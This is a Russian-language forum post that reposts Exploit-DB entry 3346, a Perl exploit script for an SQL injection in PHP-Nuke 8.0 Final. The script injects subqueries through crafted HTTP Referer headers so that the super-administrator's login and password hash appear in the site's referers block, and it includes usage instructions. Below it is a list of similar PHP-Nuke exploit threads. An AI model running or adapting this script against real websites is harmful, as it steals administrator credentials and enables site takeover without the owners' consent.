Exploit PHP-Nuke 8.0 Final - HTTP Referers SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3346
Проверка EDB
  1. Пройдено
Автор
KRASZA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-1061
Дата публикации
2007-02-20
Код: 
#!/usr/bin/perl 
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[[email protected]]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[[email protected]]
#
#[+]You can see login and hash on web page in 'HTTP referers' block
#[+]Exploit successed
use strict;
use warnings;
use LWP;
my $adres=shift or help();
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres);
my ($respone,$referer);
banner();
	$referer="http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
	$zadanie->referer($referer);
	$respone=$ua->request($zadanie);
	$respone->is_success or die "$adres : ",$respone->message,"\n";
        $referer="http://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
	$zadanie->referer($referer);
	$respone=$ua->request($zadanie);
        $respone->is_success or die "$adres : ",$respone->message,"\n";
	print "[+]You can see login and hash on web page in 'HTTP referers' block\n";
	print "[+]Exploit successed\n";
sub banner{
	print "0day exploit for PHP-nuke <=8.0 Final\n";
        print "Sql injection attack in INSERT syntax\n";
	print "version, when 'HTTP Referers' block is on\n";
        print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
}
sub help{
	print "0day exploit for PHP-nuke <=8.0 Final\n";
	print "Sql injection attack in INSERT syntax\n";
	print "version, when 'HTTP Referers' block is on\n";
	print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
	print "Use:\n";
	print "\tperl exploit.pl [url]\n";
	print "\t[url]-vicitim webpage with index.php\n";
	print "Example:\n";
	print "\tperl exploit.pl http://phpnuke.org/index.php\n";
	exit(0);
}

# milw0rm.com [2007-02-20]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit PHP-Nuke 8.0 Final - 'sid' SQL Injection
Ответы
0
Просмотры
288
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHP-Nuke 8.0 Final - 'INSERT' Blind SQL Injection (MySQL)
Ответы
0
Просмотры
282
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHP-Nuke 8.0 Final - 'INSERT' SQL Injection
Ответы
0
Просмотры
259
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHP-Nuke 7.9 Final - 'phpbb_root_path' Remote File Inclusions
Ответы
0
Просмотры
292
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHP-Nuke 'Submit_News' Component - SQL Injection
Ответы
0
Просмотры
541
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections
Ответы
0
Просмотры
507
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHP-Nuke 7.x - 'Block-Old_Articles.php' SQL Injection
Ответы
0
Просмотры
482
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHP-Nuke 0-7 - Delete God Admin Access Control Bypass
Ответы
0
Просмотры
478
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MOAUB #11 - ASP Nuke SQL Injection Vulnerability
Ответы
0
Просмотры
470
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit ASP Nuke - SQL Injection
Ответы
0
Просмотры
461
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу